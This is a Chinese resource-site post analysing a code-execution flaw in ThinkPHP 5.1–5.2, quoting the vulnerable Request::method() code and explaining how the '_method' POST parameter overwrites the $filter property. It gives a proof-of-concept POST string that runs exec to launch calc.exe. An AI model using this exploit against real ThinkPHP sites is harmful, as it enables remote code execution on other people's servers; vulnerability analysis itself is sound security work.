最新公告
  • 欢迎加入阿奇源码资源网团队,精品资源持续增加!立即加入我们
  • Thinkphp5.1 ~ 5.2 全版本代码执行

    广告!请自辨真伪 广告!请自辨真伪 广告!请自辨真伪
    云产品限时秒杀,1核2G首年99元 限时注册送一年会员,注册自动到账

    最近爆出了Thinkphp5.0.*全版本代码执行,其中5.1与5.2全版本在生产环境下下同样也存在代码执行

    漏洞分析:

    文件位置:/thinkphp/library/think/Request.php

    1. /**
    2. * 当前的请求类型
    3. * @access public
    4. * @param bool $origin 是否获取原始请求类型
    5. * @return string
    6. */
    7. public function method($origin = false)
    8. {
    9. if ($origin) {
    10. // 获取原始请求类型
    11. return $this->server('REQUEST_METHOD') ?: 'GET';
    12. } elseif (!$this->method) {
    13. if (isset($_POST[$this->config['var_method']])) {
    14. $this->method = strtoupper($_POST[$this->config['var_method']]);
    15. $method = strtolower($this->method);
    16. $this->{$method} = $_POST;
    17. } elseif ($this->server('HTTP_X_HTTP_METHOD_OVERRIDE')) {
    18. $this->method = strtoupper($this->server('HTTP_X_HTTP_METHOD_OVERRIDE'));
    19. } else {
    20. $this->method = $this->server('REQUEST_METHOD') ?: 'GET';
    21. }
    22. }
    23. return $this->method;
    24. }

    其中:

    1. $this->method = strtoupper($_POST[$this->config['var_method']]);
    2. $method = strtolower($this->method);
    3. $this->{$method} = $_POST;
    4. $method变量是$this->method,其同等于POST的”_method”参数值

    然后该处存在一个变量覆盖

    我们可以覆盖 $filter 属性值(POC如下)

    1. c=exec&f=calc.exe&&_method=filter&

    访问如下图所示:

     

    Thinkphp5.1 ~ 5.2 全版本代码执行

     

    会爆出一个警告级别的异常,导致程序终止

    如何触发:

    如果设置忽略异常提示,如下图:

     

    Thinkphp5.1 ~ 5.2 全版本代码执行

     

    本身项目发布就需要屏蔽异常和错误所以这个配置是一个正常的配置

    Payload(POST请求):

     

    Thinkphp5.1 ~ 5.2 全版本代码执行

     

    弹出计算器

    声明:本站发布的文章及附件仅限用于学习和研究目的.请勿用于商业或违法用途,否则后果请用户自负。 本站所有资源不带技术支持,下载资源请24小时内删除,如用于违法用途,或者商业用途,一律使用者承担。

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!hnymwl@foxmail.com
    2. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!
    3. 如果你也有好源码或者教程,可以到审核区发布,分享有金币奖励和额外收入!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    7. 本站不保证所提供下载的资源的准确性、安全性和完整性,源码仅供下载学习之用!
    8. 如用于商业或者违法用途,与本站无关,一切后果请用户自负!
    阿奇源码 » Thinkphp5.1 ~ 5.2 全版本代码执行

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    开通终身会员能下载全站资源码?
    可以100%下载全站源码资源的,除部分失效资源,失效的可以联系客服尝试恢复。

    发表评论